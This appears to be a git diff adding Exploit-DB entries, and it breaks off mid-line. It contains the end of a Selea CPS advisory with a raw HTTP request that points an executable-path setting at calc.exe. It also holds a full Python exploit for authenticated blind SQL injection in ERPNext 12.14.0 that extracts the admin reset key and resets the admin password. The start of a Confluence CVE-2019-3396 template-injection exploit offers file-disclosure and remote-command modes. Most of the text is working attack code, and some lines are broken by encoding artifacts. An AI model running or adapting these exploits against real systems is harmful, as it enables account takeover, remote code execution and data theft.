CPS +software connects to the national operations centre and provides law enforcement +authorities with necessary tools to issue alerts. CPS is designed to guarantee +cooperation among different law enforcement agencies. It allows to create a +multi-user environment that manages different hierarchy levels and the related +division of competences. + +Desc: The server suffers from an arbitrary win32/64 binary executable execution +when setting the NO_LIST_EXE_PATH variable to a program of choice. The command +will be executed if proper trigger criteria is met. It can be exploited via CSRF +or by navigating to /cps/ endpoint from the camera IP and bypass authentication +gaining the ability to modify the running configuration including changing the +password of admin and other users. + +Tested on: Microsoft Windows 10 Enterprise + SeleaCPSHttpServer/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5622 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php + + +08.11.2020 + +-- + + +POST /config_request?ACTION=WRITE HTTP/1.1 +Host: localhost:8080 +Connection: keep-alive +Content-Length: 6309 +Authorization: Basic ZmFrZTpmYWtl +Accept: application/json, text/plain, */* +LoginMode: angular +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75 +AuthToken: 6d0c4568-5c17-11eb-ab5f-54e1ad89571a +content-type: application/json +Origin: http://localhost:8080 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost:8080/ +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9 + + +{ + "ACTIONS": { + "ANIA_LIST_DAYS_NUM": "15", + "ANIA_LIST_PWD": "", + "ANIA_LIST_USER": "{B64valuehereommited}", + "BLACK_LIST_COUNTRY": "", + "EXACT_MATCH": "false", + "FUZZY_MATCH": "true", + "MINISTEROTRASPORTI_LIST_DAYS_NUM": "15", + "MINISTEROTRASPORTI_LIST_ENABLE_CHECK": "0,1", + "MINISTEROTRASPORTI_LIST_GET_OWNERS": "false", + "MINISTEROTRASPORTI_LIST_PWD": "", + "MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_CARPLATE": "false", + "MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_REVISION": "false", + "MINISTEROTRASPORTI_LIST_USER": "", + "MINISTEROTRASPORTI_LIST_USE_SELEA_SERVER": "false", + "MINISTEROTRASPORTI_LIST_USE_VPN": "true", + "MINISTEROTRASPORTI_LIST_VPN_PASSWORD": "", + "MINISTEROTRASPORTI_LIST_VPN_USERNAME": "", + "MINISTERO_LIST_DAYS_NUM": "24", + "MINISTERO_LIST_PWD": "", + "MINISTERO_LIST_USER": "", + "NO_LIST_ENABLED": "true", + "NO_LIST_ENABLE_EXE": "true", + "NO_LIST_EXE_PATH": "C:/windows/system32/calc.exe", + "NO_LIST_HTTP": "http://localhost:8080/$TRIGGER_EXE_VAR", + "NO_LIST_HTTP_ENABLED": "false", + "NO_LIST_SEND_TCP_ALARM": "", + "PERMISSIVE_MATCH": "true", + "WHITE_LIST_ALLOWED_COUNTRY_TYPE_INFO": "" + }, + "CAMERAINFO": { + "BA__________": { + "APPROACHING": "", + "CustomCameraId": "", + "CustomGateId": "", + "DetectDesc": "ZSL", + "DetectId": "", + "Direction": "", + "GPSLocation": "", + "GateDesc": "3", + "GateId": "", + "LEAVING": "", + "ZoneName": "", + "setname": "false", + "skip": "false" + } + }, + "CONTEXT": { + "BA__________": { + "URL": [ + "https://www.zeroscience.mk" + ] + } + }, + "DBMS": { + "DB_NAME": "", + "DB_PASSWORD": "", + "DB_SERVER": "", + "DB_TYPE": "sqlite", + "DB_USERNAME": "", + "ENCRYPT_DB": "false", + "SQLITE_MAX_MB_RAM_CACHE": "-1" + }, + "EMAIL": { + "DEST": "", + "FROM_EMAIL": "", + "FROM_NAME": "", + "LOG_USER_SEARCH": "false", + "MIN_EMAIL_TIME": "5", + "PASSWORD": "", + "PORT": "25", + "SEND_EMAIL_ON_TAMPER": "false", + "SERVER": "", + "SSL": "false", + "USERNAME": "", + "XOAUTH2": "false" + }, + "EMAIL-XOAUTH2": { + "refresh_token": "" + }, + "EZ_CLIENTS": { + "PASSWORD": "", + "SLAVES": "", + "USERNAME": "", + "USE_CNTLM": "false", + "WANT_CTX": "false" + }, + "EZ_CLIENT_SCNTT": { + "CTX": "true", + "HOST": "", + "PASSWORD": "", + "PORT": "443", + "USERNAME": "" + }, + "FTPSYNC": { + "DELETE_OLD_SYNC_DAYS": "7", + "JSON_CONFIG": "eyJzZXJ2ZXJzX2NvbmZpZyI6IFtdfQ==", + "SAVE_FTP_SEND_ERRORS": "true" + }, + "GLOBAL_HTTP_PROXY": { + "CNTLM_ENABLED": "false", + "EZ_ADDRESS": "cps.selea.com", + "EZ_PORT": "8999", + "HOST": "", + "NON_PROXY_HOST": "localhost|^(10|127|169\\.254|172\\.1[6-9]|172\\.2[0-9]|172\\.3[0-1]|192\\.168)\\..+", + "PASSWORD": "", + "PORT": "", + "PROXY_ENABLED": "true", + "USERNAME": "" + }, + "HTTPS": { + "CERTIFICATE": "", + "ENABLE_HTTP2": "true", + "GET_CERTIFICATE_FROM_SELEA": "false", + "PRIVATE_KEY": "", + "ROOT_CERTIFICATE": "" + }, + "MASTER_CPS": { + "ENABLED": "true", + "MASTERS": "", + "PASSWORD": "", + "USERNAME": "" + }, + "PROXY_TCP": { + "ENABLED": "false", + "USE_HTTP_PROXY": "false" + }, + "REMOTE_LIST": { + "ADDRESS": "", + "ENABLED": "false", + "PASSWORD": "", + "PORT": "", + "USERNAME": "" + }, + "REPORT": { + "STATS_AGGREGATE": "true", + "STATS_ENABLED": "false", + "STATS_FREQ": "MONTH", + "STATS_PATH": "", + "STATS_SELECTED": "", + "STATS_WEEK_DAY": "Mon" + }, + "SCNTT": { + "LIST_A1_DAYS_LIMIT": "0", + "SCNTT_PASSWORD": "", + "SCNTT_PRIV_KEY_FILENAME": "", + "SCNTT_PUB_CERT": "", + "SCNTT_SYSTEM_DESC": "", + "SCNTT_SYSTEM_ID": "", + "SCNTT_USERNAME": "" + }, + "SETTINGS": { + "ALLOW_FLASH_NOTIFICATIONS": "true", + "AUTO_UPDATE": "true", + "BACKUP_AT_SPECIFIC_HOUR": "-1", + "BACKUP_DB_PATH": "", + "BACKUP_EVERY_HOURS": "0", + "CARPLATE_DETAILS_ENABLED": "false", + "CHECK_EXPIRING_CARPLATES": "false", + "CHECK_EXPIRING_CARPLATES_DAYS": "7", + "CHECK_FILENAME_SYNTAX": "true", + "DB_DELETE_DAYS": "90", + "DB_DELETE_ENABLE": "false", + "DB_DELETE_LOG_DAYS": "7", + "DB_DELETE_OCR_FILE": "90", + "DB_STATS_DELETE_DAYS": "90", + "DISABLE_WHITELIST_REMOTE_DB_CHECK": "false", + "ENCRYPT_IMAGES": "false", + "FREE_DISK_LIMIT": "1000", + "FRIENDLY_NAME": "test", + "FTP_CUSTOM_PORT_RANGE": "false", + "FTP_DOWNLOAD_DISABLED": "true", + "FTP_ENABLED": "true", + "FTP_EXTERN_IP": "", + "FTP_EXTERN_IP_AUTO": "false", + "FTP_LIST_DIR_DISABLED": "true", + "FTP_MAX_PORT": "0", + "FTP_MIN_PORT": "0", + "FTP_PORT": "21", + "FTP_USERS": "", + "FTP_USE_FTPS": "true", + "HTTP2_PORT": "8081", + "HTTP_PASSWORD": "CR_B_B64/emEEokEfjdQqWo5pfQtoTCA80va3gcU", + "HTTP_PORT": "8080", + "HTTP_USERNAME": "admin", + "IGNORE_CONTEXT_FOR_UNREADFAKE": "false", + "IGNORE_IF_NOT_SYNTAX_MATCH": "false", + "MILESTONE_CONNECTIONS": "5", + "MILESTONE_ENABLED": "true", + "MILESTONE_ENABLE_ACTIVE_CONNECTION": "false", + "MILESTONE_PORT": "5666", + "MILESTON_REMOTE_IP": "", + "MILESTON_REMOTE_PORT": "8080", + "MIN_LOG_LEVEL": "0", + "PERIODIC_BACKUP_CONFIG": "0", + "REMOVE_BLACK_LIST_ON_EXPIRE": "true", + "REMOVE_NON_ALARM_CARPLATE": "false", + "REMOVE_WHITE_LIST_ON_EXPIRE": "true", + "SAVE_GATEWAY_SEND_ERRORS": "true", + "SAVE_GATEWAY_SEND_ERRORS_MAX_DAYS": "7", + "SEND_EMAIL_ON_LOST_CONNECTION": "false", + "SEND_EMAIL_ON_LOST_CONNECTION_MIN_TIME": "600", + "SEND_EMAIL_ON_NO_PLATE_READ": "false", + "SEND_EMAIL_ON_NO_PLATE_READ_MIN_TIME": "12", + "SERVER_NTP_ON": "false", + "SERVER_NTP_PORT": "123", + "USE_HTTPS": "false" + }, + "VPNC": { + "VPN_NET_NAME": "" + }, + "TCP_TEMPLATES": [] +} \ No newline at end of file diff --git a/exploits/multiple/webapps/49464.py b/exploits/multiple/webapps/49464.py new file mode 100755 index 000000000..2582642e8 --- /dev/null +++ b/exploits/multiple/webapps/49464.py @@ -0,0 +1,280 @@ +# Exploit Title: ERPNext 12.14.0 - SQL Injection (Authenticated) +# Date: 21-01-21 +# Exploit Author: Hodorsec +# Vendor Homepage: http://erpnext.org +# Software Link: https://erpnext.org/download +# Version: 12.14.0 +# Tested on: Ubuntu 18.04 + +#!/usr/bin/python3 + +# AUTHENTICATED SQL INJECTION VULNERABILITY +# In short: +# Found an authenticated SQL injection when authenticated as a low-privileged user as the parameters "or_filter" and "filters" are not being sanitized sufficiently. Although several sanitation and blacklist attempts are used in the code for other parameters, these parameters aren't checked. This allows, for example, a retrieval of the admin reset token and reset the admin account using a new password as being shown in the PoC. +# +# Longer story: +# Via the "frappe.model.db_query.get_list" CMD method, it's possible to abuse the "or_filters" parameter to successfully exploit a blind time-based SQL injection using an array/list as parameter using '["{QUERY}"]', where {QUERY} is any unfiltered SQL query. +# The "or_filters" parameter is used as part of the SELECT query, along with parameters "fields", "order_by", "group_by" and "limit". When entering any subselect in the "or_filters" or "filters" parameter, no checks are being made if any blacklisted word is being used. +# Initially, the requests where performed using the HTTP POST method which checks for a CSRF token. However, converting the request to an HTTP GET method, the CSRF token isn't required nor checked. +# Test environment: +# Tested against the latest development OVA v12 and updated using 'bench update', which leads to Frappe / ERPNext version v12.14.0. +# Cause: +# In "apps/frappe/frappe/model/db_query.py" the HTTP parameters "filters" and "or_filters" aren't being sanitized sufficiently. + +# STEPS NOT INCLUDED IN SCRIPT DUE TO MAILSERVER DEPENDENCY +# 1. Create account +# 1.a. Use update-password link for created user received via mail +# STEPS INCLUDED IN SCRIPT +# 1. Login using existing low-privileged account +# 2. Use SQL Injection vulnerability in "frappe/frappe/nodel/db_query/get_list" function by not sanitizing parameters "filters" and "or_filters" sufficiently +# 3. Retrieve reset key for admin user +# 4. Reset admin account using given password + +# DEMONSTRATION +# $ python3 poc_erpnext_12.14.0_auth_sqli_v1.0.py hodorhodor@nowhere.local passpass1234@ admin password123411111 http://192.168.252.8/ 2 +# [*] Got an authenticated session, continue to perform SQL injection... +# [*] Retrieving 1 row of data using username 'admin' column 'name' and 'tabUser' as table... +# admin@nowhere.local +# [*] Retrieved value 'admin@nowhere.local' for username 'admin' column 'name' in row 1 +# [*] Sent reset request for 'admin@nowhere.local +# [*] Retrieving 1 row of data using username 'admin' column 'reset_password_key' and 'tabUser' as table... +# xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX +# [*] Retrieved value 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX' for username 'admin' column 'reset_password_key' in row 1 +# [+] Retrieved email 'admin@nowhere.local' and reset key 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX' +# [+} RESETTED ACCOUNT 'admin@nowhere.local' WITH NEW PASSWORD 'password123=411111! +# +# [+] Done! + +import requests +import urllib3 +import os +import sys +import re + +# Optionally, use a proxy +# proxy = "http://:@:" +proxy = "" +os.environ['http_proxy'] = proxy +os.environ['HTTP_PROXY'] = proxy +os.environ['https_proxy'] = proxy +os.environ['HTTPS_PROXY'] = proxy + +# Disable cert warnings +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +# Set timeout +timeout = 30 + +# Injection prefix and suffix +inj_prefix = "[\"select(sleep(" +inj_suffix = "))))\"]" + +# Decimal begin and end +dec_begin = 48 +dec_end = 57 + +# ASCII char begin and end +ascii_begin = 32 +ascii_end = 126 + +# Handle CTRL-C +def keyboard_interrupt(): + """Handles keyboardinterrupt exceptions""" + print("\n\n[*] User requested an interrupt, exiting...") + exit(0) + +# Custom headers +def http_headers(): + headers = { + 'User-Agent': "Mozilla", + } + return headers + +# Get an authenticated session + +def get_session(url,headers,email,password): + data = {'cmd':'login', + 'usr':email, + 'pwd':password, + 'device':'desktop'} + session = requests.session() + r = session.post(url,headers=headers,data=data,timeout=timeout,= +allow_redirects=True,verify=False) + if "full_name" in r.text: + return session + else: + print("[!] Unable to get an authenticated session, check credentials...") + exit(-1) + +# Perform the SQLi call for injection +def sqli(url,session,headers,inj_str,sleep): + comment_inj_str = re.sub(" ","+",inj_str) + inj_params = {'cmd':'frappe.model.db_query.get_list', + 'filters':'["idx=1"]', + 'or_filters':inj_str, + 'fields':'idx', + 'doctype':'Report', + 'order_by':'idx', + 'group_by':'idx'} + + # inj_params[param] = comment_inj_str + inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_para= +ms.items()) + =20 + # Do GET + r = session.get(url,params=inj_params,headers=headers,timeout=t= +imeout,verify=False) + res = r.elapsed.total_seconds() + if res >= sleep: + return True + elif res < sleep: + return False + else: + print("[!] Something went wrong checking responses. Check responses manually. Exiting.") + exit(-1) + +# Loop through positions and characters +def get_data(url,session,headers,prefix,suffix,row,column,table,username,sleep): + extracted = "" + max_pos_len = 35 + # Loop through length of string + # Not very efficient, should use a guessing algorithm + for pos in range(1,max_pos_len): + # Test if current pos does have any valid value. If not, break + direction = ">" + inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" = ++ direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix + suffix + if not sqli(url,session,headers,inj_str,sleep): + break + # Loop through ASCII printable characters + direction = "=" + for guess in range(ascii_begin,ascii_end+1): + extracted_char = chr(guess) + inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix + suffix + if sqli(url,session,headers,inj_str,sleep): + extracted += chr(guess) + print(extracted_char,end='',flush=True) + break + return extracted + + +def forgot_password(url,headers,sqli_email): + data = {'cmd':'frappe.core.doctype.user.user.reset_password', + 'user':sqli_email} + r = requests.post(url,headers=headers,data=data,verify=False,al= +low_redirects=False,timeout=timeout) + if "Password reset instructions have been sent to your email" in r.text= +: + return r + +def reset_account(url,headers,sqli_email,sqli_reset_key,new_password): + data = {'key':sqli_reset_key, + 'old_password':'', + 'new_password':new_password, + 'logout_all_sessions':'0', + 'cmd':'frappe.core.doctype.user.user.update_password'} + r = requests.post(url,headers=headers,data=data,verify=False,al= +low_redirects=False,timeout=timeout) + if r.status_code == 200: + return r + +# Main +def main(argv): + if len(sys.argv) == 7: + email = sys.argv[1] + password = sys.argv[2] + username = sys.argv[3] + new_password = sys.argv[4] + url = sys.argv[5] + sleep = int(sys.argv[6]) + else: + print("[*] Usage: " + sys.argv[0] + " ") + print("[*] Example: " + sys.argv[0] + " hodorhodor@nowhere.local passpass1234@ admin password1234@ http://192.168.252.8/ 2\n") + exit(0) + + # Random headers + headers = http_headers() + + # Sleep divide by 2 due to timing caused by specific DBMS query + sleep = sleep / 2 + + # Optional prefix / suffix + prefix = "" + suffix = "" + + # Tables / columns / values + table = 'tabUser' + columns = ['name','reset_password_key'] + sqli_email = "" + sqli_reset_key = "" + + # Rows + rows = 1 + + # Do stuff + try: + # Get an authenticated session + session = get_session(url,headers,email,password) + if session: + print("[*] Got an authenticated session, continue to perform SQL injection...") + =20 + # Getting values for found rows in specified columns + for column in columns: + print("[*] Retrieving " + str(rows) + " row of data using username '" + username + "' column '" + column + "' and '" + table + "' as table...") + for row in range(0,rows): + retrieved = get_data(url,session,headers,prefix,suffix,ro= +w,column,table,username,sleep) + print("\n[*] Retrieved value '" + retrieved + "' for username '" + username + "' column '" + column + "' in row " + str(row+1)) + if column == 'name': + sqli_email = retrieved + # Generate a reset token in database + if forgot_password(url,headers,sqli_email): + print("[*] Sent reset request for '" + sqli_email + "'"= +) + else: + print("[!] Something went wrong sending a reset request, check requests or listening mail server...") + exit(-1) + elif column == 'reset_password_key': + sqli_reset_key = retrieved + + # Print retrieved values + print("[+] Retrieved email '" + sqli_email + "' and reset key '" + = +sqli_reset_key + "'") + + # Reset the desired account + if reset_account(url,headers,sqli_email,sqli_reset_key,new_password= +): + print("[+} RESETTED ACCOUNT '" + sqli_email + "' WITH NEW PASSWORD '" + new_password + "'") + else: + print("[!] Something went wrong when attempting to reset account, check requests: perhaps password not complex enough?") + exit(-1) + =20 + # Done + print("\n[+] Done!\n") + except requests.exceptions.Timeout: + print("[!] Timeout error\n") + exit(-1) + except requests.exceptions.TooManyRedirects: + print("[!] Too many redirects\n") + exit(-1) + except requests.exceptions.ConnectionError: + print("[!] Not able to connect to URL\n") + exit(-1) + except requests.exceptions.RequestException as e: + print("[!] " + str(e)) + exit(-1) + except requests.exceptions.HTTPError as e: + print("[!] Failed with error code - " + str(e.code) + "\n") + exit(-1) + except KeyboardInterrupt: + keyboard_interrupt() + exit(-1) + +# If we were called as a program, go execute the main function. +if __name__ == "__main__": + main(sys.argv[1:]) + +# Timeline: +# 22-12-20: Sent initial description and PoC via https://erpnext.com/security +# 08-01-21: No reply nor response received, sent reminder via same form. Sent Twitter notifications. +# 21-01-21: No response received, public disclosure \ No newline at end of file diff --git a/exploits/multiple/webapps/49465.py b/exploits/multiple/webapps/49465.py new file mode 100755 index 000000000..68e977e73 --- /dev/null +++ b/exploits/multiple/webapps/49465.py @@ -0,0 +1,778 @@ +# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI +# Date: 21-Jan-2021 +# Exploit Author: 46o60 +# Vendor Homepage: https://www.atlassian.com/software/confluence +# Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin +# Version: 6.12.1 +# Tested on: Ubuntu 20.04.1 LTS +# CVE : CVE-2019-3396 + +#!/usr/bin/env python3 +# -*- coding: UTF-8 -*- +""" + +Exploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian +Confluence Server server-side template injection. + +Vulnerability information: + Authors: + Daniil Dmitriev - Discovering vulnerability + Dmitry (rrock) Shchannikov - Metasploit module + Exploit + ExploitDB: + https://www.exploit-db.com/exploits/46731 + Metasploit + https://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/ + exploit/multi/http/confluence_widget_connector + +While Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made +from the target Confluence server towards attacker's server where the Velocity template with the payload is being +hosted. If this is not possible, for example, because network where the target Confluence server is located filters all +outbound traffic, alternative approach is needed. This exploit, in addition to original exploit implements this +alternative approach by first uploading the template to the server and then loading it with original vulnerability from +local file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any +user can upload a file to the server by attaching the file to his "personal space". + +There are two modes of the exploit: + 1. Exploiting path traversal for file disclosure and directory listings. + 2. RCE by uploading a template file with payload to the server. + +In case where network is filtered and loading remote template is not possible and also you do not have a low-privileged +user session, you can still exploit the '_template' parameter to browse the server file system by using the first mode +of this exploit. Conveniently, application returns file content as well as directory listing depending on to what path +is pointing to. As in original exploit no authentication is needed for this mode. + +Limitations of path traversal exploit: +- not possible to distinguish between non-existent path and lack of permissions +- no distinction between files and directories in the output + +If you have ability to authenticate to the server and have enough privileges to upload files use the second mode. A +regular user probably has enough privileges for this since each user can have their own personal space where they +should be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not +exists, a file with Velocity template payload. It then uses the original vulnerability but loads the template file +with payload from local filesystem instead from remote system. + +Prerequisite of RCE in this exploit: +- authenticated session is needed +- knowledge of where attached files are stored on the file system - if it is not default location then use first mode +to find it, should be in Confluence install directory under ./attachments subdirectory + +Usage +- list /etc folder on Confluence server hosted on http://confluence.example.com + python exploit.py -th confluence.example.com fs /etc +- get content of /etc/passwd on same server but through a proxy + python exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd +- execute 'whoami' command on the same server (this will upload a template file with payload to the server using +existing session) + python exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB "whoami" + +Tested on Confluence versions: + 6.12.1 + +To test the exploit: + 1. Download Confluence trial version for version 6.12.1 + https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin + (to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser + network tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and + change the version in URL to be 6.12.1) + SHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin + 2. Run the binary to install it, for example on Ubuntu 20.04. Use "Express Install" and everything by default. + chmod +x atlassian-confluence-6.12.1-x64.bin + sudo ./atlassian-confluence-6.12.1-x64.bin + 3. Open the browser to configure initial installation, when you get to license window copy the server ID. + 4. Create account at https://my.atlassian.com/ and request for new trial license using server ID. + 5. Activate the license and finish the installation with default options. + 6. Create a user and login with him to go through initial user setup and get the session id for RCE part of the + exploit. + 7. Run the exploit (see usage above). +""" + +__version__ = "1.0.0" +__author__ = "46o60" + +import argparse +import logging +import requests +import urllib3 +from bs4 import BeautifulSoup +import re +import json +import random +import string + +# script and banner +SCRIPT_NAME = "CVE-2019-3396: Confluence exploit script" +ASCII_BANNER_TEXT = """____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____ +| | | |\ | |___ | | | |___ |\ | | | | |__/ +|___ |__| | \| | |___ |__| |___ | \| |___ |__| | \ + +""" + +# turn off requests log output +urllib3.disable_warnings() +logging.getLogger("urllib3").setLevel(logging.WARNING) + + +def print_banner(): + """ + Prints script ASCII banner and basic information. + + Because it is cool. + """ + print(ASCII_BANNER_TEXT) + print("{} v{}".format(SCRIPT_NAME, __version__)) + print("Author: {}".format(__author__)) + print() + + +def exit_log(logger, message): + """ + Utility function to log exit message and finish the script. + """ + logger.error(message) + exit(1) + + +def check_cookie_format(value): + """ + Checks if value is in format: ^[^=]+=[^=]+$ + """ + pattern = r"^[^=]+=[^=]+$" + if not re.match(pattern, value): + raise argparse.ArgumentTypeError("provided cookie string does not have correct format") + return value + + +def parse_arguments(): + """ + Performs parsing of script arguments. + """ + # creating parser + parser = argparse.ArgumentParser( + prog=SCRIPT_NAME, + description="Exploit CVE-2019-3396 to explore file system or gain RCE through file upload." + ) + + # general script arguments + parser.add_argument( + "-V", "--version", + help="displays the current version of the script", + action="version", + version="{name} {version}".format(name=SCRIPT_NAME, version=__version__) + ) + parser.add_argument( + "-v", "--verbosity", + help="increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity", + action="count", + default=0 + ) + parser.add_argument( + "-sb", "--skip-banner", + help="skips printing of the banner", + action="store_true", + default=False + ) + parser.add_argument( + "-s", "--silent", + help="do not output results of the exploit to standard output", + action="store_true", + default=False + ) + parser.add_argument( + "-q", "--quiet", + help="do not output any logs", + action="store_true", + default=False + ) + + # arguments for input + parser.add_argument( + "-px", "--proxy", + help="proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS" + ) + parser.add_argument( + "-t", "--tls", + help="use HTTPS protocol, default behaviour is to use plain HTTP", + action="store_true" + ) + parser.add_argument( + "-th", "--target-host", + help="target hostname/domain", + required=True + ) + parser.add_argument( + "-p", "--port", + help="port where the target is listening, default ports 80 for HTTP and 443 for HTTPS" + ) + + # two different sub commands + subparsers = parser.add_subparsers( + title="actions", + description="different behaviours of the script", + help="for detail description of available action options invoke -h for each individual action", + dest="action" + ) + + # only exploring file system by disclosure of files and directories + parser_file_system = subparsers.add_parser( + "fs", + help="use the exploit to browse local file system on the target endpoint" + ) + parser_file_system.add_argument( + "path", + help="target path that should be retrieved from the vulnerable server, can be path to a file or to a directory" + ) + parser_file_system.set_defaults(func=exploit_path_traversal) + + # using file upload to deploy payload and achieve RCE + parser_rce = subparsers.add_parser( + "rce", + help="use the exploit to upload a template " + ) + parser_rce.add_argument( + "-hd", "--home-directory", + help="Confluence home directory on the server" + ) + parser_rce.add_argument( + "-c", "--cookie", + help="cookie that should be used for the session, value passed as it is in HTTP request, for example: " + "-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB", + type=check_cookie_format, + required=True + ) + parser_rce.add_argument( + "command", + help="target path that should be retrieved from the vulnerable server, can be path to a file or to a directory" + ) + parser_rce.set_defaults(func=exploit_rce) + + # parsing + arguments = parser.parse_args() + + return arguments + + +class Configuration: + """ + Represents all supported configuration items. + """ + + # Parse arguments and set all configuration variables + def __init__(self, script_args): + self.script_arguments = script_args + + # setting input arguments + self._proxy = self.script_arguments.proxy + self._target_protocol = "https" if self.script_arguments.tls else "http" + self._target_host = self.script_arguments.target_host + self._target_port = self.script_arguments.port if self.script_arguments.port else \ + 443 if self.script_arguments.tls else 80 + + @staticmethod + def get_logger(verbosity): + """ + Prepares logger to output to stdout with appropriate verbosity. + """ + logger = logging.getLogger() + # default logging level + logger.setLevel(logging.DEBUG) + + # Definition of logging to console + ch = logging.StreamHandler() + # specific logging level for console + if verbosity == 0: + ch.setLevel(logging.INFO) + elif verbosity > 0: + ch.setLevel(logging.DEBUG) + + # formatting + class MyFormatter(logging.Formatter): + + default_fmt = logging.Formatter('[?] %(message)s') + info_fmt = logging.Formatter('[+] %(message)s') + error_fmt = logging.Formatter('[-] %(message)s') + warning_fmt = logging.Formatter('[!] %(message)s') + debug_fmt = logging.Formatter('>>> %(message)s') + + def format(self, record): + if record.levelno == logging.INFO: + return self.info_fmt.format(record) + elif record.levelno == logging.ERROR: + return self.error_fmt.format(record) + elif record.levelno == logging.WARNING: + return self.warning_fmt.format(record) + elif record.levelno == logging.DEBUG: + return self.debug_fmt.format(record) + else: + return self.default_fmt.format(record) + + ch.setFormatter(MyFormatter()) + + # adding handler + logger.addHandler(ch) + + return logger + + # Properties + @property + def endpoint(self): + if not self._target_protocol or not self._target_host or not self._target_port: + exit_log(log, "failed to generate endpoint URL") + return f"{self._target_protocol}://{self._target_host}:{self._target_port}" + + @property + def remote_path(self): + return self.script_arguments.path + + @property + def attachment_dir(self): + home_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \ + Exploit.DEFAULT_CONFLUENCE_INSTALL_DIR + return f"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}" + + @property + def rce_command(self): + return self.script_arguments.command + + @property + def session_cookie(self): + if not self.script_arguments.cookie: + return None + parts = self.script_arguments.cookie.split("=") + return { + parts[0]: parts[1] + } + + @property + def proxies(self): + return { + "http": self._proxy, + "https": self._proxy + } + + +class Exploit: + """ + This class represents actual exploit towards the target Confluence server. + """ + # used for both path traversal and RCE + DEFAULT_VULNERABLE_ENDPOINT = "/rest/tinymce/1/macro/preview" + + # used only for RCE + CREATE_PERSONAL_SPACE_PATH = "/rest/create-dialog/1.0/space-blueprint/create-personal-space" + PERSONAL_SPACE_KEY_PATH = "/index.action" + PERSONAL_SPACE_KEY_REGEX = r"^/spaces/viewspace\.action\?key=(.*?)$" + PERSONAL_SPACE_ID_PATH = "/rest/api/space" + PERSONAL_SPACE_KEY_PARAMETER_NAME = "spaceKey" + HOMEPAGE_REGEX = r"/rest/api/content/([0-9]+)$" + ATL_TOKEN_PATH = "/pages/viewpageattachments.action" + FILE_UPLOAD_PATH = "/pages/doattachfile.action" + # file name has no real significance, file is identified on file system by it's ID + # (change only if you want to avoid detection) + DEFAULT_UPLOADED_FILE_NAME = "payload_{}.vm".format( + ''.join(random.choice(string.ascii_lowercase) for i in range(5)) + ) # the extension .vm is not really needed, remove it if you have problems uploading the template + DEFAULT_CONFLUENCE_INSTALL_DIR = "/var/atlassian/application-data/confluence" + DEFAULT_CONFLUENCE_ATTACHMENT_PATH = "/attachments/ver003" + # using random name for uploaded file so it will always be first version of the file + DEFAULT_FILE_VERSION = "1" + + def __init__(self, config): + """ + Runs the exploit towards target_url. + """ + self._config = config + + self._target_url = f"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}" + + if self._config.script_arguments.action == "rce": + self._root_url = f"{self._config.endpoint}/" + self._create_personal_space_url = f"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}" + self._personal_space_key_url = f"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}" + + # Following data will be dynamically created while exploit is running + self._space_key = None + self._personal_space_id_url = None + self._space_id = None + self._homepage_id = None + self._atl_token_url = None + self._atl_token = None + self._upload_url = None + self._file_id = None + + def generate_payload_location(self): + """ + Generates location on file system for uploaded attachment based on Confluence Ver003 scheme. + + See more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html + """ + if not self._space_id or not self._homepage_id or not self._file_id: + exit_log(log, "cannot generate payload location without space, homepage and file ID") + + space_folder_one = str(int(self._space_id[-3:]) % 250) + space_folder_two = str(int(self._space_id[-6:-3]) % 250) + space_folder_three = self._space_id + page_folder_one = str(int(self._homepage_id[-3:]) % 250) + page_folder_two = str(int(self._homepage_id[-6:-3]) % 250) + page_folder_three = self._homepage_id + file_folder = self._file_id + version = Exploit.DEFAULT_FILE_VERSION + + payload_location = f"{self._config.attachment_dir}/" \ + 